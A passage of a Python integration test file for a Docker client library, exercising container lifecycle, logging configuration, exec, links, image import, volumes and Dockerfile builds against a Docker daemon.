groups = logs.strip().split(' ')
self.assertIn('1000', groups)
self.assertIn('1001', groups)
class CreateContainerWithLogConfigTest(BaseTestCase):
def test_valid_log_driver_and_log_opt(self):
log_config = docker.utils.LogConfig(
type='json-file',
config={'max-file': '100'}
)
container = self.client.create_container(
'busybox', ['true'],
host_config=self.client.create_host_config(log_config=log_config)
)
self.tmp_containers.append(container['Id'])
self.client.start(container)
info = self.client.inspect_container(container)
container_log_config = info['HostConfig']['LogConfig']
self.assertEqual(container_log_config['Type'], log_config.type)
self.assertEqual(container_log_config['Config'], log_config.config)
def test_invalid_log_driver_raises_exception(self):
log_config = docker.utils.LogConfig(
type='asdf-nope',
config={}
)
container = self.client.create_container(
'busybox', ['true'],
host_config=self.client.create_host_config(log_config=log_config)
)
expected_msg = "logger: no log driver named 'asdf-nope' is registered"
with pytest.raises(APIError) as excinfo:
# raises an internal server error 500
self.client.start(container)
assert expected_msg in str(excinfo.value)
@pytest.mark.skipif(True,
reason="https://github.com/docker/docker/issues/15633")
def test_valid_no_log_driver_specified(self):
log_config = docker.utils.LogConfig(
type="",
config={'max-file': '100'}
)
container = self.client.create_container(
'busybox', ['true'],
host_config=self.client.create_host_config(log_config=log_config)
)
self.tmp_containers.append(container['Id'])
self.client.start(container)
info = self.client.inspect_container(container)
container_log_config = info['HostConfig']['LogConfig']
self.assertEqual(container_log_config['Type'], "json-file")
self.assertEqual(container_log_config['Config'], log_config.config)
def test_valid_no_config_specified(self):
log_config = docker.utils.LogConfig(
type="json-file",
config=None
)
container = self.client.create_container(
'busybox', ['true'],
host_config=self.client.create_host_config(log_config=log_config)
)
self.tmp_containers.append(container['Id'])
self.client.start(container)
info = self.client.inspect_container(container)
container_log_config = info['HostConfig']['LogConfig']
self.assertEqual(container_log_config['Type'], "json-file")
self.assertEqual(container_log_config['Config'], {})
class TestCreateContainerReadOnlyFs(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
ctnr = self.client.create_container(
'busybox', ['mkdir', '/shrine'],
host_config=self.client.create_host_config(
read_only=True, network_mode='none'
)
)
self.assertIn('Id', ctnr)
self.tmp_containers.append(ctnr['Id'])
self.client.start(ctnr)
res = self.client.wait(ctnr)
self.assertNotEqual(res, 0)
class TestCreateContainerWithName(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', 'true', name='foobar')
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
inspect = self.client.inspect_container(res['Id'])
self.assertIn('Name', inspect)
self.assertEqual('/foobar', inspect['Name'])
class TestRenameContainer(BaseTestCase):
def runTest(self):
version = self.client.version()['Version']
name = 'hong_meiling'
res = self.client.create_container('busybox', 'true')
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
self.client.rename(res, name)
inspect = self.client.inspect_container(res['Id'])
self.assertIn('Name', inspect)
if version == '1.5.0':
self.assertEqual(name, inspect['Name'])
else:
self.assertEqual('/{0}'.format(name), inspect['Name'])
class TestStartContainer(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', 'true')
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
self.client.start(res['Id'])
inspect = self.client.inspect_container(res['Id'])
self.assertIn('Config', inspect)
self.assertIn('Id', inspect)
self.assertTrue(inspect['Id'].startswith(res['Id']))
self.assertIn('Image', inspect)
self.assertIn('State', inspect)
self.assertIn('Running', inspect['State'])
if not inspect['State']['Running']:
self.assertIn('ExitCode', inspect['State'])
self.assertEqual(inspect['State']['ExitCode'], 0)
class TestStartContainerWithDictInsteadOfId(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', 'true')
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
self.client.start(res)
inspect = self.client.inspect_container(res['Id'])
self.assertIn('Config', inspect)
self.assertIn('Id', inspect)
self.assertTrue(inspect['Id'].startswith(res['Id']))
self.assertIn('Image', inspect)
self.assertIn('State', inspect)
self.assertIn('Running', inspect['State'])
if not inspect['State']['Running']:
self.assertIn('ExitCode', inspect['State'])
self.assertEqual(inspect['State']['ExitCode'], 0)
class TestCreateContainerPrivileged(BaseTestCase):
def runTest(self):
res = self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
privileged=True, network_mode='none'
)
)
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
self.client.start(res['Id'])
inspect = self.client.inspect_container(res['Id'])
self.assertIn('Config', inspect)
self.assertIn('Id', inspect)
self.assertTrue(inspect['Id'].startswith(res['Id']))
self.assertIn('Image', inspect)
self.assertIn('State', inspect)
self.assertIn('Running', inspect['State'])
if not inspect['State']['Running']:
self.assertIn('ExitCode', inspect['State'])
self.assertEqual(inspect['State']['ExitCode'], 0)
# Since Nov 2013, the Privileged flag is no longer part of the
# container's config exposed via the API (safety concerns?).
#
if 'Privileged' in inspect['Config']:
self.assertEqual(inspect['Config']['Privileged'], True)
class TestWait(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', ['sleep', '3'])
id = res['Id']
self.tmp_containers.append(id)
self.client.start(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
inspect = self.client.inspect_container(id)
self.assertIn('Running', inspect['State'])
self.assertEqual(inspect['State']['Running'], False)
self.assertIn('ExitCode', inspect['State'])
self.assertEqual(inspect['State']['ExitCode'], exitcode)
class TestWaitWithDictInsteadOfId(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', ['sleep', '3'])
id = res['Id']
self.tmp_containers.append(id)
self.client.start(res)
exitcode = self.client.wait(res)
self.assertEqual(exitcode, 0)
inspect = self.client.inspect_container(res)
self.assertIn('Running', inspect['State'])
self.assertEqual(inspect['State']['Running'], False)
self.assertIn('ExitCode', inspect['State'])
self.assertEqual(inspect['State']['ExitCode'], exitcode)
class TestLogs(BaseTestCase):
def runTest(self):
snippet = 'Flowering Nights (Sakuya Iyazoi)'
container = self.client.create_container(
'busybox', 'echo {0}'.format(snippet)
)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
logs = self.client.logs(id)
self.assertEqual(logs, (snippet + '\n').encode(encoding='ascii'))
class TestLogsWithTailOption(BaseTestCase):
def runTest(self):
snippet = '''Line1
Line2'''
container = self.client.create_container(
'busybox', 'echo "{0}"'.format(snippet)
)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
logs = self.client.logs(id, tail=1)
self.assertEqual(logs, ('Line2\n').encode(encoding='ascii'))
# class TestLogsStreaming(BaseTestCase):
# def runTest(self):
# snippet = 'Flowering Nights (Sakuya Iyazoi)'
# container = self.client.create_container(
# 'busybox', 'echo {0}'.format(snippet)
# )
# id = container['Id']
# self.client.start(id)
# self.tmp_containers.append(id)
# logs = bytes() if six.PY3 else str()
# for chunk in self.client.logs(id, stream=True):
# logs += chunk
# exitcode = self.client.wait(id)
# self.assertEqual(exitcode, 0)
# self.assertEqual(logs, (snippet + '\n').encode(encoding='ascii'))
class TestLogsWithDictInsteadOfId(BaseTestCase):
def runTest(self):
snippet = 'Flowering Nights (Sakuya Iyazoi)'
container = self.client.create_container(
'busybox', 'echo {0}'.format(snippet)
)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
logs = self.client.logs(container)
self.assertEqual(logs, (snippet + '\n').encode(encoding='ascii'))
class TestDiff(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
diff = self.client.diff(id)
test_diff = [x for x in diff if x.get('Path', None) == '/test']
self.assertEqual(len(test_diff), 1)
self.assertIn('Kind', test_diff[0])
self.assertEqual(test_diff[0]['Kind'], 1)
class TestDiffWithDictInsteadOfId(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
diff = self.client.diff(container)
test_diff = [x for x in diff if x.get('Path', None) == '/test']
self.assertEqual(len(test_diff), 1)
self.assertIn('Kind', test_diff[0])
self.assertEqual(test_diff[0]['Kind'], 1)
class TestStop(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
self.client.stop(id, timeout=2)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
if exec_driver_is_native():
self.assertNotEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], False)
class TestStopWithDictInsteadOfId(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
self.assertIn('Id', container)
id = container['Id']
self.client.start(container)
self.tmp_containers.append(id)
self.client.stop(container, timeout=2)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
if exec_driver_is_native():
self.assertNotEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], False)
class TestKill(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
self.client.kill(id)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
if exec_driver_is_native():
self.assertNotEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], False)
class TestKillWithDictInsteadOfId(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
self.client.kill(container)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
if exec_driver_is_native():
self.assertNotEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], False)
class TestKillWithSignal(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '60'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
self.client.kill(id, signal=signal.SIGKILL)
exitcode = self.client.wait(id)
self.assertNotEqual(exitcode, 0)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
self.assertNotEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], False, state)
class TestPort(BaseTestCase):
def runTest(self):
port_bindings = {
'1111': ('127.0.0.1', '4567'),
'2222': ('127.0.0.1', '4568')
}
container = self.client.create_container(
'busybox', ['sleep', '60'], ports=list(port_bindings.keys()),
host_config=self.client.create_host_config(
port_bindings=port_bindings, network_mode='bridge'
)
)
id = container['Id']
self.client.start(container)
# Call the port function on each biding and compare expected vs actual
for port in port_bindings:
actual_bindings = self.client.port(container, port)
port_binding = actual_bindings.pop()
ip, host_port = port_binding['HostIp'], port_binding['HostPort']
self.assertEqual(ip, port_bindings[port][0])
self.assertEqual(host_port, port_bindings[port][1])
self.client.kill(id)
class TestMacAddress(BaseTestCase):
def runTest(self):
mac_address_expected = "02:42:ac:11:00:0a"
container = self.client.create_container(
'busybox', ['sleep', '60'], mac_address=mac_address_expected)
id = container['Id']
self.client.start(container)
res = self.client.inspect_container(container['Id'])
self.assertEqual(mac_address_expected,
res['NetworkSettings']['MacAddress'])
self.client.kill(id)
class TestRestart(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
info = self.client.inspect_container(id)
self.assertIn('State', info)
self.assertIn('StartedAt', info['State'])
start_time1 = info['State']['StartedAt']
self.client.restart(id, timeout=2)
info2 = self.client.inspect_container(id)
self.assertIn('State', info2)
self.assertIn('StartedAt', info2['State'])
start_time2 = info2['State']['StartedAt']
self.assertNotEqual(start_time1, start_time2)
self.assertIn('Running', info2['State'])
self.assertEqual(info2['State']['Running'], True)
self.client.kill(id)
class TestRestartWithDictInsteadOfId(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
self.assertIn('Id', container)
id = container['Id']
self.client.start(container)
self.tmp_containers.append(id)
info = self.client.inspect_container(id)
self.assertIn('State', info)
self.assertIn('StartedAt', info['State'])
start_time1 = info['State']['StartedAt']
self.client.restart(container, timeout=2)
info2 = self.client.inspect_container(id)
self.assertIn('State', info2)
self.assertIn('StartedAt', info2['State'])
start_time2 = info2['State']['StartedAt']
self.assertNotEqual(start_time1, start_time2)
self.assertIn('Running', info2['State'])
self.assertEqual(info2['State']['Running'], True)
self.client.kill(id)
class TestRemoveContainer(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['true'])
id = container['Id']
self.client.start(id)
self.client.wait(id)
self.client.remove_container(id)
containers = self.client.containers(all=True)
res = [x for x in containers if 'Id' in x and x['Id'].startswith(id)]
self.assertEqual(len(res), 0)
class TestRemoveContainerWithDictInsteadOfId(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['true'])
id = container['Id']
self.client.start(id)
self.client.wait(id)
self.client.remove_container(container)
containers = self.client.containers(all=True)
res = [x for x in containers if 'Id' in x and x['Id'].startswith(id)]
self.assertEqual(len(res), 0)
class TestCreateContainerWithVolumesFrom(BaseTestCase):
def runTest(self):
vol_names = ['foobar_vol0', 'foobar_vol1']
res0 = self.client.create_container(
'busybox', 'true', name=vol_names[0]
)
container1_id = res0['Id']
self.tmp_containers.append(container1_id)
self.client.start(container1_id)
res1 = self.client.create_container(
'busybox', 'true', name=vol_names[1]
)
container2_id = res1['Id']
self.tmp_containers.append(container2_id)
self.client.start(container2_id)
with self.assertRaises(docker.errors.DockerException):
self.client.create_container(
'busybox', 'cat', detach=True, stdin_open=True,
volumes_from=vol_names
)
res2 = self.client.create_container(
'busybox', 'cat', detach=True, stdin_open=True,
host_config=self.client.create_host_config(
volumes_from=vol_names, network_mode='none'
)
)
container3_id = res2['Id']
self.tmp_containers.append(container3_id)
self.client.start(container3_id)
info = self.client.inspect_container(res2['Id'])
self.assertCountEqual(info['HostConfig']['VolumesFrom'], vol_names)
class TestCreateContainerWithLinks(BaseTestCase):
def runTest(self):
res0 = self.client.create_container(
'busybox', 'cat',
detach=True, stdin_open=True,
environment={'FOO': '1'})
container1_id = res0['Id']
self.tmp_containers.append(container1_id)
self.client.start(container1_id)
res1 = self.client.create_container(
'busybox', 'cat',
detach=True, stdin_open=True,
environment={'FOO': '1'})
container2_id = res1['Id']
self.tmp_containers.append(container2_id)
self.client.start(container2_id)
# we don't want the first /
link_path1 = self.client.inspect_container(container1_id)['Name'][1:]
link_alias1 = 'mylink1'
link_env_prefix1 = link_alias1.upper()
link_path2 = self.client.inspect_container(container2_id)['Name'][1:]
link_alias2 = 'mylink2'
link_env_prefix2 = link_alias2.upper()
res2 = self.client.create_container(
'busybox', 'env', host_config=self.client.create_host_config(
links={link_path1: link_alias1, link_path2: link_alias2},
network_mode='none'
)
)
container3_id = res2['Id']
self.tmp_containers.append(container3_id)
self.client.start(container3_id)
self.assertEqual(self.client.wait(container3_id), 0)
logs = self.client.logs(container3_id)
if six.PY3:
logs = logs.decode('utf-8')
self.assertIn('{0}_NAME='.format(link_env_prefix1), logs)
self.assertIn('{0}_ENV_FOO=1'.format(link_env_prefix1), logs)
self.assertIn('{0}_NAME='.format(link_env_prefix2), logs)
self.assertIn('{0}_ENV_FOO=1'.format(link_env_prefix2), logs)
class TestRestartingContainer(BaseTestCase):
def runTest(self):
container = self.client.create_container(
'busybox', ['sleep', '2'],
host_config=self.client.create_host_config(
restart_policy={"Name": "always", "MaximumRetryCount": 0},
network_mode='none'
)
)
id = container['Id']
self.client.start(id)
self.client.wait(id)
with self.assertRaises(docker.errors.APIError) as exc:
self.client.remove_container(id)
err = exc.exception.response.text
self.assertIn(
'You cannot remove a running container', err
)
self.client.remove_container(id, force=True)
class TestExecuteCommand(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.exec_create(id, ['echo', 'hello'])
self.assertIn('Id', res)
exec_log = self.client.exec_start(res)
self.assertEqual(exec_log, b'hello\n')
class TestExecuteCommandString(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.exec_create(id, 'echo hello world')
self.assertIn('Id', res)
exec_log = self.client.exec_start(res)
self.assertEqual(exec_log, b'hello world\n')
class TestExecuteCommandStringAsUser(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.exec_create(id, 'whoami', user='default')
self.assertIn('Id', res)
exec_log = self.client.exec_start(res)
self.assertEqual(exec_log, b'default\n')
class TestExecuteCommandStringAsRoot(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.exec_create(id, 'whoami')
self.assertIn('Id', res)
exec_log = self.client.exec_start(res)
self.assertEqual(exec_log, b'root\n')
class TestExecuteCommandStreaming(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exec_id = self.client.exec_create(id, ['echo', 'hello\nworld'])
self.assertIn('Id', exec_id)
res = b''
for chunk in self.client.exec_start(exec_id, stream=True):
res += chunk
self.assertEqual(res, b'hello\nworld\n')
class TestExecInspect(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
container = self.client.create_container('busybox', 'cat',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exec_id = self.client.exec_create(id, ['mkdir', '/does/not/exist'])
self.assertIn('Id', exec_id)
self.client.exec_start(exec_id)
exec_info = self.client.exec_inspect(exec_id)
self.assertIn('ExitCode', exec_info)
self.assertNotEqual(exec_info['ExitCode'], 0)
class TestRunContainerStreaming(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', '/bin/sh',
detach=True, stdin_open=True)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
sock = self.client.attach_socket(container, ws=False)
self.assertTrue(sock.fileno() > -1)
class TestPauseUnpauseContainer(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['sleep', '9999'])
id = container['Id']
self.tmp_containers.append(id)
self.client.start(container)
self.client.pause(id)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
self.assertEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], True)
self.assertIn('Paused', state)
self.assertEqual(state['Paused'], True)
self.client.unpause(id)
container_info = self.client.inspect_container(id)
self.assertIn('State', container_info)
state = container_info['State']
self.assertIn('ExitCode', state)
self.assertEqual(state['ExitCode'], 0)
self.assertIn('Running', state)
self.assertEqual(state['Running'], True)
self.assertIn('Paused', state)
self.assertEqual(state['Paused'], False)
class TestCreateContainerWithHostPidMode(BaseTestCase):
def runTest(self):
ctnr = self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
pid_mode='host', network_mode='none'
)
)
self.assertIn('Id', ctnr)
self.tmp_containers.append(ctnr['Id'])
self.client.start(ctnr)
inspect = self.client.inspect_container(ctnr)
self.assertIn('HostConfig', inspect)
host_config = inspect['HostConfig']
self.assertIn('PidMode', host_config)
self.assertEqual(host_config['PidMode'], 'host')
#################
# LINKS TESTS #
#################
class TestRemoveLink(BaseTestCase):
def runTest(self):
# Create containers
container1 = self.client.create_container(
'busybox', 'cat', detach=True, stdin_open=True
)
container1_id = container1['Id']
self.tmp_containers.append(container1_id)
self.client.start(container1_id)
# Create Link
# we don't want the first /
link_path = self.client.inspect_container(container1_id)['Name'][1:]
link_alias = 'mylink'
container2 = self.client.create_container(
'busybox', 'cat', host_config=self.client.create_host_config(
links={link_path: link_alias}, network_mode='none'
)
)
container2_id = container2['Id']
self.tmp_containers.append(container2_id)
self.client.start(container2_id)
# Remove link
linked_name = self.client.inspect_container(container2_id)['Name'][1:]
link_name = '%s/%s' % (linked_name, link_alias)
self.client.remove_container(link_name, link=True)
# Link is gone
containers = self.client.containers(all=True)
retrieved = [x for x in containers if link_name in x['Names']]
self.assertEqual(len(retrieved), 0)
# Containers are still there
retrieved = [
x for x in containers if x['Id'].startswith(container1_id) or
x['Id'].startswith(container2_id)
]
self.assertEqual(len(retrieved), 2)
##################
# IMAGES TESTS #
##################
class TestPull(BaseTestCase):
def runTest(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
res = self.client.pull('hello-world')
self.tmp_imgs.append('hello-world')
self.assertEqual(type(res), six.text_type)
self.assertGreaterEqual(
len(self.client.images('hello-world')), 1
)
img_info = self.client.inspect_image('hello-world')
self.assertIn('Id', img_info)
class TestPullStream(BaseTestCase):
def runTest(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
stream = self.client.pull('hello-world', stream=True)
self.tmp_imgs.append('hello-world')
for chunk in stream:
if six.PY3:
chunk = chunk.decode('utf-8')
json.loads(chunk) # ensure chunk is a single, valid JSON blob
self.assertGreaterEqual(
len(self.client.images('hello-world')), 1
)
img_info = self.client.inspect_image('hello-world')
self.assertIn('Id', img_info)
class TestCommit(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
self.assertIn('Id', res)
img_id = res['Id']
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
self.assertIn('Container', img)
self.assertTrue(img['Container'].startswith(id))
self.assertIn('ContainerConfig', img)
self.assertIn('Image', img['ContainerConfig'])
self.assertEqual('busybox', img['ContainerConfig']['Image'])
busybox_id = self.client.inspect_image('busybox')['Id']
self.assertIn('Parent', img)
self.assertEqual(img['Parent'], busybox_id)
class TestRemoveImage(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
self.assertIn('Id', res)
img_id = res['Id']
self.tmp_imgs.append(img_id)
self.client.remove_image(img_id, force=True)
images = self.client.images(all=True)
res = [x for x in images if x['Id'].startswith(img_id)]
self.assertEqual(len(res), 0)
##################
# IMPORT TESTS #
##################
class ImportTestCase(BaseTestCase):
'''Base class for `docker import` test cases.'''
TAR_SIZE = 512 * 1024
def write_dummy_tar_content(self, n_bytes, tar_fd):
def extend_file(f, n_bytes):
f.seek(n_bytes - 1)
f.write(bytearray([65]))
f.seek(0)
tar = tarfile.TarFile(fileobj=tar_fd, mode='w')
with tempfile.NamedTemporaryFile() as f:
extend_file(f, n_bytes)
tarinfo = tar.gettarinfo(name=f.name, arcname='testdata')
tar.addfile(tarinfo, fileobj=f)
tar.close()
@contextlib.contextmanager
def dummy_tar_stream(self, n_bytes):
'''Yields a stream that is valid tar data of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file
@contextlib.contextmanager
def dummy_tar_file(self, n_bytes):
'''Yields the name of a valid tar file of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file.name
class TestImportFromBytes(ImportTestCase):
'''Tests importing an image from in-memory byte data.'''
def runTest(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
# The generic import_image() function cannot import in-memory bytes
# data that happens to be represented as a string type, because
# import_image() will try to use it as a filename and usually then
# trigger an exception. So we test the import_image_from_data()
# function instead.
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
class TestImportFromFile(ImportTestCase):
'''Tests importing an image from a tar file on disk.'''
def runTest(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
# statuses = self.client.import_image(
# src=tar_filename, repository='test/import-from-file')
statuses = self.client.import_image_from_file(
tar_filename, repository='test/import-from-file')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
class TestImportFromStream(ImportTestCase):
'''Tests importing an image from a stream containing tar data.'''
def runTest(self):
with self.dummy_tar_stream(n_bytes=self.TAR_SIZE) as tar_stream:
statuses = self.client.import_image(
src=tar_stream, repository='test/import-from-stream')
# statuses = self.client.import_image_from_stream(
# tar_stream, repository='test/import-from-stream')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
class TestImportFromURL(ImportTestCase):
'''Tests downloading an image over HTTP.'''
@contextlib.contextmanager
def temporary_http_file_server(self, stream):
'''Serve data from an IO stream over HTTP.'''
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'application/x-tar')
self.end_headers()
shutil.copyfileobj(stream, self.wfile)
server = socketserver.TCPServer(('', 0), Handler)
thread = threading.Thread(target=server.serve_forever)
thread.setDaemon(True)
thread.start()
yield 'http://%s:%s' % (socket.gethostname(), server.server_address[1])
server.shutdown()
@pytest.mark.skipif(True, reason="Doesn't work inside a container - FIXME")
def runTest(self):
# The crappy test HTTP server doesn't handle large files well, so use
# a small file.
TAR_SIZE = 10240
with self.dummy_tar_stream(n_bytes=TAR_SIZE) as tar_data:
with self.temporary_http_file_server(tar_data) as url:
statuses = self.client.import_image(
src=url, repository='test/import-from-url')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
#################
# VOLUMES TESTS #
#################
@requires_api_version('1.21')
class TestVolumes(BaseTestCase):
def test_create_volume(self):
name = 'perfectcherryblossom'
self.tmp_volumes.append(name)
result = self.client.create_volume(name)
self.assertIn('Name', result)
self.assertEqual(result['Name'], name)
self.assertIn('Driver', result)
self.assertEqual(result['Driver'], 'local')
def test_create_volume_invalid_driver(self):
driver_name = 'invalid.driver'
with pytest.raises(docker.errors.NotFound):
self.client.create_volume('perfectcherryblossom', driver_name)
def test_list_volumes(self):
name = 'imperishablenight'
self.tmp_volumes.append(name)
volume_info = self.client.create_volume(name)
result = self.client.volumes()
self.assertIn('Volumes', result)
volumes = result['Volumes']
self.assertIn(volume_info, volumes)
def test_inspect_volume(self):
name = 'embodimentofscarletdevil'
self.tmp_volumes.append(name)
volume_info = self.client.create_volume(name)
result = self.client.inspect_volume(name)
self.assertEqual(volume_info, result)
def test_inspect_nonexistent_volume(self):
name = 'embodimentofscarletdevil'
with pytest.raises(docker.errors.NotFound):
self.client.inspect_volume(name)
def test_remove_volume(self):
name = 'shootthebullet'
self.tmp_volumes.append(name)
self.client.create_volume(name)
result = self.client.remove_volume(name)
self.assertTrue(result)
def test_remove_nonexistent_volume(self):
name = 'shootthebullet'
with pytest.raises(docker.errors.NotFound):
self.client.remove_volume(name)
#################
# BUILDER TESTS #
#################
class TestBuild(BaseTestCase):
def runTest(self):
if compare_version(self.client._version, '1.8') < 0:
return
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
img, logs = self.client.build(fileobj=script)
self.assertNotEqual(img, None)
self.assertNotEqual(img, '')
self.assertNotEqual(logs, '')
container1 = self.client.create_container(img, 'test -d /tmp/test')
id1 = container1['Id']
self.client.start(id1)
self.tmp_containers.append(id1)
exitcode1 = self.client.wait(id1)
self.assertEqual(exitcode1, 0)
container2 = self.client.create_container(img, 'test -d /tmp/test')
id2 = container2['Id']
self.client.start(id2)
self.tmp_containers.append(id2)
exitcode2 = self.client.wait(id2)
self.assertEqual(exitcode2, 0)
self.tmp_imgs.append(img)
class TestBuildStream(BaseTestCase):
def runTest(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
stream = self.client.build(fileobj=script, stream=True)
logs = ''
for chunk in stream:
if six.PY3:
chunk = chunk.decode('utf-8')
json.loads(chunk) # ensure chunk is a single, valid JSON blob
logs += chunk
self.assertNotEqual(logs, '')
class TestBuildFromStringIO(BaseTestCase):
def runTest(self):
if six.PY3:
return
script = io.StringIO(six.text_type('\n').join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]))
stream = self.client.build(fileobj=script, stream=True)
logs = ''
